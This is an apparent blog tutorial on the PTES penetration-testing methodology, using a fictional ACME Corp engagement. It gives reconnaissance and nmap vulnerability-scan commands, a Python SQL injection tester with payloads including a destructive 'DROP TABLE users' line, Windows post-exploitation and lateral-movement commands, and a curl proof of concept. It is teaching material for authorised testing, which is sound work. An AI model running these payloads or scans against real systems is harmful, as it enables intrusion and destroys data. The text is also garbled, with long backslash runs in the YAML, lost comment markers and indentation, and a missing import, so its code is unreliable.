Introduction
Penetration testing simulates real-world attacks to identify security vulnerabilities before adversaries exploit them. A structured methodology ensures consistent, repeatable, and comprehensive assessments. The Penetration Testing Execution Standard (PTES) provides a widely adopted framework.
The PTES Standard
PTES defines seven phases for penetration testing, each with specific activities and deliverables.
Phase 1: Pre-Engagement Interactions
Define scope, rules of engagement, and legal boundaries before any testing begins.
rules_of_engagement:
client: "ACME Corp"
scope:
in_scope:
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- "*.acme.com"
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- "203.0.113.0/24"
out_of_scope:
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- "payment.acme.com" # Production payment system
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- "10.0.0.0/8" # Internal only
restrictions:
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- no_social_engineering: true
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- no_dos_attacks: true
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- testing_window: "2026-05-15T00:00Z - 2026-05-19T23:59Z"
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- notification_list: ["security@acme.com", "incident-response@acme.com"]
legal:
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- authorized_signatory: "Jane Doe, CISO"
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- insurance_coverage: true
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- data_handling_nda_signed: true
Phase 2: Intelligence Gathering (Reconnaissance)
Reconnaissance builds a target profile through passive and active information gathering.
Passive recon — DNS enumeration
dig axfr @ns1.acme.com acme.com
dnsrecon -d acme.com -t axfr
dnsrecon -d acme.com -t std --db acme_recon.db
Subdomain discovery
sublist3r -d acme.com -o subdomains.txt
Technology fingerprinting
whatweb -a 3 https://www.acme.com --log-verbose=tech_report.txt
Certificate transparency logs
curl -s "https://crt.sh/?q=%.acme.com&output;=json" | jq -r '.[].name_value' | sort -u
Phase 3: Vulnerability Analysis
Analyze gathered information to identify potential vulnerabilities.
Port scanning with Nmap
nmap -sV -sC -O -p- --min-rate=1000 -oA acme_scan 203.0.113.0/24
Service enumeration
nmap -sV --script=http-enum,http-headers,http-methods,ssl-enum-ciphers \
-p 80,443 203.0.113.0/24 -oA acme_web_scan
Vulnerability scanning
nmap --script=vuln -p 80,443,22,3389 203.0.113.0/24 -oA acme_vuln
Phase 4: Exploitation
Exploitation attempts to breach the target using identified vulnerabilities.
Custom exploit example — SQL injection test
import requests
def test_sqli(url, params):
payloads = [
"' OR '1'='1",
"' UNION SELECT NULL,NULL--",
"1; DROP TABLE users--",
"' WAITFOR DELAY '00:00:05'--",
]
for param, value in params.items():
for payload in payloads:
test_params = params.copy()
test_params[param] = payload
start = time.time()
resp = requests.get(url, params=test_params, timeout=10)
elapsed = time.time() - start
Time-based detection
if elapsed > 5:
print(f"[!] Time-based SQLi in {param}: {payload}")
Error-based detection
if any(err in resp.text for err in ["SQL syntax", "mysql_fetch", "ORA-"]):
print(f"[!] Error-based SQLi in {param}: {payload}")
Phase 5: Post-Exploitation
After gaining access, assess the value of compromised systems and establish persistence.
Post-exploitation enumeration
whoami /all
systeminfo | findstr /B "OS Name OS Version System Type"
net localgroup administrators
netstat -ano
wmic product get name,version
Lateral movement check
powershell -Command "Get-WmiObject -Class Win32_ComputerSystem -ComputerName TARGET"
Phase 6: Reporting
The report is the primary deliverable. It must be clear, actionable, and properly scoped for different audiences.
report_structure:
executive_summary:
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- risk_rating: "High"
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- total_findings: 12
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- critical: 2
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- high: 4
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- medium: 4
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- low: 2
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- business_impact: "SQL injection in main application could lead to complete data breach"
technical_findings:
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- finding_id: "F-001"
title: "SQL Injection in /api/search endpoint"
severity: "Critical"
cvss: 9.1
description: "User input is directly concatenated into SQL queries"
affected_endpoint: "POST /api/search"
poc: "curl -X POST https://app.acme.com/api/search -d 'query=1%27+OR+%271%27%3D%271'"
remediation: "Use parameterized queries; implement input validation"
remediation_timeline:
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- immediate: "Patch critical SQL injection and RCE vulnerabilities"
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- short_term: "Implement WAF and input validation"
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\- long_term: "Security training for developers, SAST integration in CI/CD"
Phase 7: Post-Engagement
Cleanup, evidence destruction, and lessons learned.
Conclusion
Effective penetration testing follows a disciplined methodology. PTES provides comprehensive coverage from legal agreements through reporting. The true value of a pentest lies not in how many vulnerabilities are found, but in the actionable remediation guidance provided in the final report.
Enjoy this article? Share your thoughts, questions, or experiences in the comments below — your insights help other readers too.
Join the discussion ↓